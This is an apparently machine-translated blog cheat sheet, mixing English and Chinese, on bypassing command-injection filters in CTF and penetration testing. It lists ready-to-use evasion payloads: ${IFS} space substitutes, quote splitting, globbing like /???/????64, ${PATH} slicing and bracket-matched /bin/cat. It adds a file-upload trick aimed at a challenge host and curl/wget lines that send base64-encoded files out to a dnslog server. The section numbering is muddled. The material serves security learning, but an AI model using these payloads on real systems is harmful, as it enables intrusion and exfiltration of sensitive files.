Table of contents
1. Common alternative commands:
3. Simple symbols bypass regularity
1. Single and double quotation marks
2. The cross-line character '\' is bypassed
4. Wildcards bypass regularity
1. Commands that can be obtained by wildcarding
Five, variable splicing bypasses regularity
7. "${}" intercepts environment variable splicing
Eight, [] square brackets match bypass
Execution function without echo:
2. dnslog external data method
Foreword:
The RCE bypass methods in this article are all encountered by bloggers in CTF topics and infiltration actual combat. There may be omissions or mistakes. I hope you guys can point out more, thank you!
1. Common alternative commands:
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
ls:查看目录
dir:查看目录
Two, space bypass
> < <> 重定向符
%20(space)
%09(tab)
$IFS$9
${IFS}(最好用这个)
$IFS
{cat,flag.txt} 在大括号中逗号可起分隔作用
3. Simple symbols bypass regularity
1. Single and double quotation marks
ca''t flag.txt
ca""t flag.txt
Because there are no characters in the single and double quotation marks, it is equivalent to adding no characters in it, and the meaning of the command remains the same
2. The cross-line character '\' is bypassed
The meaning of the cross-line character is to follow the content of the previous line, go to the next line and then enter the command. Both the upper and lower lines are a command
4. Wildcards bypass regularity
Wildcards can replace any character
Shell wildcards are:
- * : Indicates wildcard characters 0 times or more
- ? : Indicates the wildcard character 0 or
1. Commands that can be obtained by wildcarding
base64:
/bin/base64 可以通配为:
/???/????64
作用为将文件以base64编码形式输出
bzip2:
/usr/bin/bzip2 可以通配为:
/???/???/????2
作用为将文件压缩成后缀为bz2的压缩文件
flag.php ==> flag.php.bz2
2. String wildcard
flag.php ==> flag.???
flag*
……
Of course, wildcards can be used to wildcard some commands, but not the full name
例如:
/bin/ca?
相当于cat命令
Five, variable splicing bypasses regularity
Variables can be defined in the shell statement to divide the filtered string into parts to bypass
以flag.php为例:
x=lag;cat f$x.php
相当于:
cat flag.php
6. Inline execution
Inline execution is to embed a subshell statement in a shell statement, and use the main shell statement to process the result of the substatement
Symbols you can use for inline statements you ${}, `` (backticks)
For example:
echo `ls`
echo ${ls}
相当于把ls的结果使用echo输出
7. "${}" intercepts environment variable splicing
For the usage of ${}, please check my blog http://t.csdn.cn/JDFmP
example
${PATH:14:1}${PATH:5:1} flag.txt
在此环境中相当于 nl flag.txt
Eight, [] square brackets match bypass
For example, [ac] represents matching characters between ab, including a, b characters themselves
The matching range is the current directory
example
/[a-c][h-j][m-o]/[b-d]a[s-u] flag.txt
相当于
/bin/cat flag.txt
因为[]匹配范围只在当前路径
所以要为bin绝对路径
Nine, source command:
The source command, also known as the dot command, can be replaced by a dot ( . )
This command can read and execute the commands in the file
Can build a file upload form, upload command file execution
The form is:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
The get request is
?c=.+/???/????????[@-[]
一般来说这个文件在linux下面保存在/tmp/php??????一般后面的6个字符是随机生成的有大小写。(可以通过linux的匹配符去匹配)
注意:通过
.去执行sh命令不需要有执行权限
可以参考p神的这篇文章
Improvement of non-alphanumeric webshell | Farewell song
10. No echo rce:
Execution function without echo:
exec()
shell_exec()
`` (backtick)
These require the php function echo to output the results
1. Copy to an accessible file
tee command:
The tee command can be used to create or append to a file
It can cooperate with open file commands such as cat and the pipe character to write the flag into the specified file
For example
先将根目录复制到某个文件,然后访问查看
ls /| tee ls.txt
然后输入 url/1.txt 即可查看根目录
再复制flag文件,然后访问查看
cat /flag.php | tee flag.txt
然后输入 url/falg.txt 即可查看根目录
还可以使用其他的复制方法
copy /flag.php flag.txt
mv /flag.php flag.txt
2. dnslog external data method
Need dnslog platform, you can build it yourself
curl dnslog平台url/`cat flag.php|base64`
wget dnslog平台url/`cat flag.php|base64`
3. Rebound shell:
I will write it when I write the right to raise